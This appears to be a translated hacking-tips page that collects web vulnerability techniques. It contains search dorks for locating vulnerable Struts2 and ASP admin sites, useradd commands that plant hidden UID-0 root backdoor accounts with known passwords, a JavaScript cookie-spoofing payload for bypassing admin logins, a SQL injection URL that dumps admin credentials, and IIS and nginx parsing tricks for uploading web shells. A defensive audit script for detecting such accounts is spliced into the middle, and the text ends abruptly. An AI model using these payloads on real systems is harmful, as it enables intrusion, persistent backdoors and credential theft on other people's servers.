2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Collection of various web vulnerabilities
struts2:
inurl:index.action
inurl:Mall.action
inurl:index.action Title:apache struts2
inurl:action?id=
site:.com inurl:index.action
inurl:dhis-web-commons
Using the tool, add an account and password:
useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p '$1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0'
Account: bingdao
Password: 1
Details of generating the encrypted password:
The following command generates an encrypted password (the first 1 is the password):
echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin
Encrypted password generated: $1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/
Then add an account with root permissions and the password above:
useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p '$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'
This gives you a user with account name "lengyu" and password "1", which you can then use to log in over SSH.
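From the defender's side, the accounts created above leave two artifacts that are easy to audit for: a second UID 0 entry in /etc/passwd and an MD5-crypt ($1$) hash in /etc/shadow. The following is an added example, not part of the original page; the function names and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page). Audits passwd- and shadow-format
# files, passed as arguments so it also works on copies taken from a disk image.

# Accounts other than "root" that hold UID 0 (what `useradd -u 0 -o` creates).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose password field is an MD5-crypt hash (prefix $1$).
md5crypt_accounts() {
    awk -F: 'index($2, "$1$") == 1 { print $1 }' "$1"
}

# Report findings; return status 1 when anything suspicious is found.
audit_accounts() {
    passwd_file=$1 shadow_file=$2 status=0
    for name in $(extra_uid0_accounts "$passwd_file"); do
        echo "ALERT: non-root account with UID 0: $name"
        status=1
    done
    for name in $(md5crypt_accounts "$shadow_file"); do
        echo "WARN: MD5-crypt (\$1\$) password hash: $name"
        status=1
    done
    return "$status"
}

# Constructed sample data: a legitimate root entry, a service account, and
# one backdoor-style entry shaped like the accounts created above.
write_sample() {
    dir=$1
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lengyu:x:0:0::/home/lengyu:/bin/sh
EOF
    cat > "$dir/shadow" <<'EOF'
root:$6$CONSTRUCTEDSALT$constructedhashvalue:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
lengyu:$1$CONSTRUC$constructedhashvalue00:19000:0:99999:7:::
EOF
}

# Usage: sh audit.sh /etc/passwd /etc/shadow   (needs read access to shadow)
if [ "$#" -eq 2 ]; then audit_accounts "$1" "$2"; fi
```

Any name reported by the first check other than a documented break-glass account should be treated as a compromise indicator, since legitimate systems have exactly one UID 0 entry.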
------------------------------------------------------
szwyadmin cookie spoofing:
inurl:szwyadmin/login.asp
inurl:szwyadmin
Code:
_javascript:alert([xss_clean]="adminuser="+escape("'or'='or'"));_javascript:alert([xss_clean]="adminpass="+escape("'or'='or'"));_javascript:alert([xss_clean]="admindj="+escape("1"));
Copy the code and press Enter. It is convenient and fast. Then close the web page, reopen the back-end address, and change login.asp to admin_index.asp in the address bar to enter the back end directly. This method has a success rate of more than 80 percent.
There is also a code for today.
It's easy to use: fill in the domain name and click to get the password. It directly injects the administrator account and password. The success rate is not ideal; after all, there are a lot of loopholes.
-------------------------------------------------------------------------------------------------------------------------
Southern data:
inurl:HrDemand.asp
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
admin/southidceditor/admin_style.asp
--------------------------------------------
Explode the library:
inurl:conn.asp
----------------
iis6 parsing vulnerability:
The requested URL/xx.jpg was not found on this server.
Note: If a folder named .asp or .asa is created under the website, files with any extension in that directory are parsed and executed by IIS as asp files.
File parsing: 1.asp;.jpg
Note: The server treats this as 1.asp. Besides asp, the IIS 6.0 default executable file types also include these three:
/1.asa
/1.cer
/1.cdx
-----------------------------------
iis7.0/iis7.5/ nginx
file, and then visit 1.jpg/.php, in this directory will generate a sentence *** shell.php
------------------------------------------------------------------
Nginx